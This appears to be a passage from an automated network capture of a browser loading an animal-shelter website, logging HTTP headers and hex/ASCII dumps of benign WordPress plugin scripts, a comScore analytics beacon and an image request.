                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6d 70 6c 65 74 65 22 2c 22 6f 66 66 22 29 7d 29 29 3b 6c 65 74 20 6e 3d 22 22 3b 63 6f 6e 73 74 20 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 22 22 2c 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 73 65 61 72 63 68 22 29 2e 6c 65 6e 67 74 68 26 26 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 73 65 61 72 63 68 22 29 2e 76 61 6c 28 22 22 29 2c 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2e 74 76 65 2d 73 74 61 74 65 2d 68 6f 76 65 72 2c 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2e 74 76 65 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 68 6f 76 65 72 22 29 7d 2c 72 3d 66 75 6e 63 74 69
                                                                                                                                                                                                                                                        Data Ascii: mplete","off")}));let n="";const d=function(){n="",t(".tve-lg-dropdown-search").length&&t(".tve-lg-dropdown-search").val(""),t(".tve-lg-dropdown-option.tve-state-hover,.tve-dynamic-dropdown-option.tve-state-hover").removeClass("tve-state-hover")},r=functi
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 2c 64 2e 68 61 73 43 6c 61 73 73 28 22 74 76 65 2d 73 74 61 74 65 2d 65 78 70 61 6e 64 65 64 22 29 26 26 28 72 2e 6c 65 6e 67 74 68 3e 30 3f 72 2e 66 69 6e 64 28 22 69 6e 70 75 74 22 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 3a 64 2e 66 69 6e 64 28 22 69 6e 70 75 74 22 29 2e 74 72 69 67 67 65 72 28 22 66 6f 63 75 73 22 29 29 2c 6f 2e 74 61 72 67 65 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 73 74 22 29 7c 7c 6f 2e 74 61 72 67 65 74 2e 63 6c 6f 73 65 73 74 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 73 65 61 72 63 68 22 29 29 72 65 74 75 72 6e 20 64 2e 66 69 6e 64 28 22 2e
                                                                                                                                                                                                                                                        Data Ascii: eClass("tve-state-expanded"),d.hasClass("tve-state-expanded")&&(r.length>0?r.find("input").trigger("focus"):d.find("input").trigger("focus")),o.target.classList.contains("tve-lg-dropdown-list")||o.target.closest(".tve-lg-dropdown-search"))return d.find(".
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2e 6c 65 6e 67 74 68 26 26 69 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 74 76 65 5f 64 69 73 70 6c 61 79 22 29 2c 64 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 38 3a 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 72 28 73 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2c 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 22 29 2e 6c 61 73 74 28 29 2c 73 29 3a 61 2e 70 72 65 76 28 29 2e 6c 65 6e 67 74 68 26 26 72 28 61 2e 70 72 65 76 28 29 2c 73 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 30 3a 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 72 28 73 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6c 67 2d 64 72 6f 70 64 6f 77 6e 2d 6f 70 74 69 6f 6e 2c 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f
                                                                                                                                                                                                                                                        Data Ascii: .length&&i.toggleClass("tve_display"),d();break;case 38:0===a.length?r(s.find(".tve-lg-dropdown-option,.tve-dynamic-dropdown-option").last(),s):a.prev().length&&r(a.prev(),s);break;case 40:0===a.length?r(s.find(".tve-lg-dropdown-option,.tve-dynamic-dropdo
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC102INData Raw: 22 63 68 61 6e 67 65 76 61 6c 75 65 2e 74 76 65 44 72 6f 70 64 6f 77 6e 22 2c 74 68 69 73 29 7d 29 29 7d 2c 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 64 72 6f 70 64 6f 77 6e 22 2c 21 30 29 7d 29 28 54 68 72 69 76 65 47 6c 6f 62 61 6c 2e 24 6a 29 3b
                                                                                                                                                                                                                                                        Data Ascii: "changevalue.tveDropdown",this)}))},TCB_Front.setModuleLoadedStatus("dropdown",!0)})(ThriveGlobal.$j);


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        69192.168.2.449824192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC629OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC673INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 6198
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/social-share.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC696INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 74 3d 7b 37 32 34 38 34 3a 28 74 2c 65 2c 6f 29 3d 3e 7b 28 28 65 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 73 3d 6f 28 32 31 37 31 35 29 2c 61 3d 6f 28 34 34 32 38 31 29 2c 69 3d 7b 69 6e 69 74 3a 28 29 3d 3e 7b 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 69 73 45 64 69 74 6f 72 50 61 67 65 28 29 7c 7c 28 65 28 22 2e 74 68 72 76 5f 73 6f 63 69 61 6c 2e 74 68 72 76 5f 73 6f 63 69 61 6c 5f 63 75 73 74 6f 6d 22 29 2e 65 61 63 68 28 28 28 74 2c 6f 29 3d 3e 69 2e 69 6e 69 74 55 49 28 65 28 6f 29 29 29 29 2c 69 2e 69 6e 69 74 42 75 74 74 6f 6e 73 28 29 2c 65 28 22 62 6f 64 79 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 74 68 72 76 5f 73 6f 63 69 61 6c 5f 63 75 73 74 6f 6d 3a 6e 6f 74 28 2e 74 68 72 76 5f 73 6f 63 69 61 6c 5f 66
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var t={72484:(t,e,o)=>{((e,n)=>{const s=o(21715),a=o(44281),i={init:()=>{TCB_Front.Utils.isEditorPage()||(e(".thrv_social.thrv_social_custom").each(((t,o)=>i.initUI(e(o)))),i.initButtons(),e("body").on("click",".thrv_social_custom:not(.thrv_social_f
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2c 61 3d 31 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 2e 69 73 46 75 6c 6c 57 69 64 74 68 29 2c 69 3d 6e 2e 73 68 6f 77 43 6f 75 6e 74 2c 72 3d 31 3d 3d 3d 70 61 72 73 65 49 6e 74 28 6e 2e 69 73 56 65 72 74 69 63 61 6c 29 2c 63 3d 74 2e 66 69 6e 64 28 22 2e 74 76 65 5f 73 6f 63 69 61 6c 5f 69 74 65 6d 73 22 29 2e 61 74 74 72 28 22 63 6c 61 73 73 22 29 2e 72 65 70 6c 61 63 65 28 2f 28 74 76 65 5f 73 6f 63 69 61 6c 5f 69 74 65 6d 73 7c 74 76 65 5f 73 6f 63 69 61 6c 5f 63 75 73 74 6f 6d 29 2f 67 2c 22 22 29 2e 6d 61 74 63 68 28 2f 28 5c 73 2b 29 3f 74 76 65 5f 73 6f 63 69 61 6c 5f 28 5b 61 2d 7a 5d 7b 32 2c 33 7d 29 2f 29 2c 64 3d 63 3f 22 74 76 65 5f 73 6f 63 69 61 6c 5f 22 2b 63 5b 32 5d 3a 22 74 76 65 5f 73 6f 63 69 61 6c 5f 69 74 62 22 3b 64 21 3d 3d 73 26
                                                                                                                                                                                                                                                        Data Ascii: ,a=1===parseInt(n.isFullWidth),i=n.showCount,r=1===parseInt(n.isVertical),c=t.find(".tve_social_items").attr("class").replace(/(tve_social_items|tve_social_custom)/g,"").match(/(\s+)?tve_social_([a-z]{2,3})/),d=c?"tve_social_"+c[2]:"tve_social_itb";d!==s&
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 73 28 29 2c 64 7d 2c 66 62 5f 73 68 61 72 65 28 74 29 7b 63 6f 6e 73 74 20 6f 3d 74 2e 64 61 74 61 28 29 3b 69 66 28 6f 2e 68 72 65 66 7c 7c 28 6f 2e 68 72 65 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 6f 2e 74 79 70 65 26 26 22 66 65 65 64 22 21 3d 3d 6f 2e 74 79 70 65 29 65 2e 77 6e 64 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 73 68 61 72 65 72 2f 73 68 61 72 65 72 2e 70 68 70 3f 75 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 68 72 65 66 29 2c 36 35 30 2c 35 30 30 29 3b 65 6c 73 65 7b 6c 65 74 20 74 3d 22 22 3b 6f 2e 6e 61 6d 65 26 26 28 74 2b 3d 22 26 74 69 74 6c 65 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 6e 61 6d 65 29 29 2c 6f 2e 64 65 73 63 72
                                                                                                                                                                                                                                                        Data Ascii: s(),d},fb_share(t){const o=t.data();if(o.href||(o.href=location.href),o.type&&"feed"!==o.type)e.wnd("https://www.facebook.com/sharer/sharer.php?u="+encodeURIComponent(o.href),650,500);else{let t="";o.name&&(t+="&title="+encodeURIComponent(o.name)),o.descr
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 6e 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 64 65 73 63 72 69 70 74 69 6f 6e 29 3a 22 22 29 2c 36 30 30 2c 36 30 30 29 7d 2c 78 69 6e 67 5f 73 68 61 72 65 28 74 29 7b 63 6f 6e 73 74 20 6f 3d 74 2e 64 61 74 61 28 29 3b 6f 2e 68 72 65 66 7c 7c 28 6f 2e 68 72 65 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 65 2e 77 6e 64 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 78 69 6e 67 2e 63 6f 6d 2f 73 70 69 2f 73 68 61 72 65 73 2f 6e 65 77 3f 75 72 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6f 2e 68 72 65 66 29 2c 36 30 30 2c 35 30 30 29 7d 7d 3b 74 2e 65 78 70 6f 72 74 73 3d 65 7d 2c 32 31 37 31 35 3a 74 3d 3e 7b 28 65 3d 3e 7b 63 6f 6e 73 74 20 6f 3d 7b 69 6e 69 74 53 68 61 72 65 43 6f 75 6e 74 73 3a 28
                                                                                                                                                                                                                                                        Data Ascii: n="+encodeURIComponent(o.description):""),600,600)},xing_share(t){const o=t.data();o.href||(o.href=location.href),e.wnd("https://www.xing.com/spi/shares/new?url="+encodeURIComponent(o.href),600,500)}};t.exports=e},21715:t=>{(e=>{const o={initShareCounts:(
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 74 26 26 74 2e 63 6f 75 6e 74 73 26 26 74 2e 74 6f 74 61 6c 73 26 26 73 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 63 6f 6e 73 74 20 6e 3d 65 28 74 68 69 73 29 2c 73 3d 6e 2e 70 72 65 76 28 22 2e 74 76 65 5f 73 5f 73 68 61 72 65 5f 63 6f 75 6e 74 22 29 2c 61 3d 6e 2e 63 68 69 6c 64 72 65 6e 28 22 2e 74 76 65 5f 73 5f 69 74 65 6d 22 29 3b 65 2e 65 61 63 68 28 74 2e 63 6f 75 6e 74 73 5b 6f 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 61 2e 66 69 6c 74 65 72 28 22 2e 74 76 65 5f 73 5f 22 2b 74 29 2e 66 69 6e 64 28 22 2e 74 76 65 5f 73 5f 63 6f 75 6e 74 22 29 2e 68 74 6d 6c 28 65 2e 66 6f 72 6d 61 74 74 65 64 29 7d 29 29 2c 61 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 5f 63 6f 75 6e 74 5f 6c 6f 61
                                                                                                                                                                                                                                                        Data Ascii: unction(t){t&&t.counts&&t.totals&&s.each((function(o){const n=e(this),s=n.prev(".tve_s_share_count"),a=n.children(".tve_s_item");e.each(t.counts[o],(function(t,e){a.filter(".tve_s_"+t).find(".tve_s_count").html(e.formatted)})),a.removeClass("tve_count_loa
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC26INData Raw: 30 29 7d 29 28 54 68 72 69 76 65 47 6c 6f 62 61 6c 2e 24 6a 29 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: 0)})(ThriveGlobal.$j)})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        70192.168.2.44981818.244.18.324432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC357OUTGET /beacon.js HTTP/1.1
                                                                                                                                                                                                                                                        Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Content-Type: text/javascript
                                                                                                                                                                                                                                                        Content-Length: 16665
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 11:22:14 GMT
                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                                                                                        Date: Wed, 08 Jan 2025 11:45:53 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=86400
                                                                                                                                                                                                                                                        ETag: "c22322b3d030360971584a98c60b6e0b"
                                                                                                                                                                                                                                                        X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                        Via: 1.1 1f5c750c03b26301631398b45f61e262.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                        X-Amz-Cf-Pop: FRA56-P11
                                                                                                                                                                                                                                                        X-Amz-Cf-Id: W7Cx3GqDYmMxfGNBsVt89fF-8Uv967JlXmxEZeiz1PMtRDNmCFSmPg==
                                                                                                                                                                                                                                                        Age: 51201
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC16384INData Raw: 76 61 72 20 43 4f 4d 53 43 4f 52 45 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 74 2c 65 3d 31 2c 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 3c 72 3b 65 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 65 5d 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 69 29 26 26 28 6e 5b 69 5d 3d 74 5b 69 5d 29 3b 72 65 74 75 72 6e 20 6e 7d 2c 74 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66
                                                                                                                                                                                                                                                        Data Ascii: var COMSCORE=function(n){var t=function(){return t=Object.assign||function(n){for(var t,e=1,r=arguments.length;e<r;e++)for(var i in t=arguments[e])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};"function"==typeof
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC281INData Raw: 6e 74 65 67 72 61 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 43 6d 70 49 6e 74 65 67 72 61 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 46 69 72 73 74 50 61 72 74 79 43 6f 6f 6b 69 65 3a 21 31 2c 62 79 70 61 73 73 55 73 65 72 43 6f 6e 73 65 6e 74 52 65 71 75 69 72 65 6d 65 6e 74 46 6f 72 31 50 43 6f 6f 6b 69 65 3a 21 31 2c 65 6e 61 62 6c 65 44 6f 63 75 6d 65 6e 74 55 72 6c 43 6f 6c 6c 65 63 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 44 6f 63 75 6d 65 6e 74 54 69 74 6c 65 43 6f 6c 6c 65 63 74 69 6f 6e 3a 21 30 2c 65 6e 61 62 6c 65 44 6f 63 75 6d 65 6e 74 52 65 66 65 72 72 65 72 43 6f 6c 6c 65 63 74 69 6f 6e 3a 21 30 7d 7d 29 2c 4e 3d 75 28 46 2c 46 2e 65 74 29 2c 42 3d 75 28 46 2c 46 2e 73 74 29 3b 72 65 74 75 72 6e 20 46 2e 66 74 28 29 2c 42 28 29 2c 6e 2e 62
                                                                                                                                                                                                                                                        Data Ascii: ntegration:!0,enableCmpIntegration:!0,enableFirstPartyCookie:!1,bypassUserConsentRequirementFor1PCookie:!1,enableDocumentUrlCollection:!0,enableDocumentTitleCollection:!0,enableDocumentReferrerCollection:!0}}),N=u(F,F.et),B=u(F,F.st);return F.ft(),B(),n.b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        71192.168.2.449831192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC435OUTGET /wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js?ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC661INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 2085
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/themes/thrive-theme/thrive-dashboard/js/dist/frontend.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Mon, 16 Dec 2024 17:13:47 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: HIT jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC708INData Raw: 28 28 29 3d 3e 7b 69 66 28 77 69 6e 64 6f 77 2e 54 56 45 5f 44 61 73 68 3d 77 69 6e 64 6f 77 2e 54 56 45 5f 44 61 73 68 7c 7c 7b 7d 2c 21 65 7c 7c 21 65 2e 24 6a 29 7b 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 24 2c 65 3d 7b 24 6a 3a 6a 51 75 65 72 79 2e 6e 6f 43 6f 6e 66 6c 69 63 74 28 29 7d 3b 61 26 26 28 77 69 6e 64 6f 77 2e 24 3d 61 29 7d 21 66 75 6e 63 74 69 6f 6e 28 61 29 7b 54 56 45 5f 44 61 73 68 2e 61 6a 61 78 5f 73 65 6e 74 3d 21 31 3b 76 61 72 20 74 3d 7b 7d 2c 73 3d 7b 7d 3b 54 56 45 5f 44 61 73 68 2e 61 64 64 5f 6c 6f 61 64 5f 69 74 65 6d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 6f 29 7b 76 61 72 20 72 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 6f 26 26 28 6f 3d 61 2e 6e 6f 6f 70 29 2c 54 56 45 5f 44 61 73 68 2e 61 6a
                                                                                                                                                                                                                                                        Data Ascii: (()=>{if(window.TVE_Dash=window.TVE_Dash||{},!e||!e.$j){var a=window.$,e={$j:jQuery.noConflict()};a&&(window.$=a)}!function(a){TVE_Dash.ajax_sent=!1;var t={},s={};TVE_Dash.add_load_item=function(e,n,o){var r;if("function"!=typeof o&&(o=a.noop),TVE_Dash.aj
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC1369INData Raw: 45 5f 44 61 73 68 2e 61 6a 61 78 5f 6c 6f 61 64 5f 6a 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 61 2e 65 61 63 68 28 65 2c 28 66 75 6e 63 74 69 6f 6e 28 73 2c 6e 29 7b 69 66 28 2d 31 21 3d 3d 73 2e 69 6e 64 65 78 4f 66 28 22 5f 62 65 66 6f 72 65 22 29 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 65 5b 73 2b 22 5f 62 65 66 6f 72 65 22 5d 26 26 61 28 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 27 2b 65 5b 73 2b 22 5f 62 65 66 6f 72 65 22 5d 2b 22 3c 5c 2f 73 63 72 69 70 74 3e 22 29 2e 61 66 74 65 72 28 74 2e 6c 61 73 74 43 68 69 6c 64 29 2c 73 26
                                                                                                                                                                                                                                                        Data Ascii: E_Dash.ajax_load_js=function(e){var t=document.body;a.each(e,(function(s,n){if(-1!==s.indexOf("_before"))return!0;var o=document.createElement("script");e[s+"_before"]&&a('<script type="text/javascript">'+e[s+"_before"]+"<\/script>").after(t.lastChild),s&
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC8INData Raw: 24 6a 29 7d 29 28 29 3b
                                                                                                                                                                                                                                                        Data Ascii: $j)})();


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        72192.168.2.449835192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC635OUTGET /wp-content/uploads/2023/06/get-involved-home.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:14 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:14 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 734033
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2023/06/get-involved-home.png>; rel="canonical"
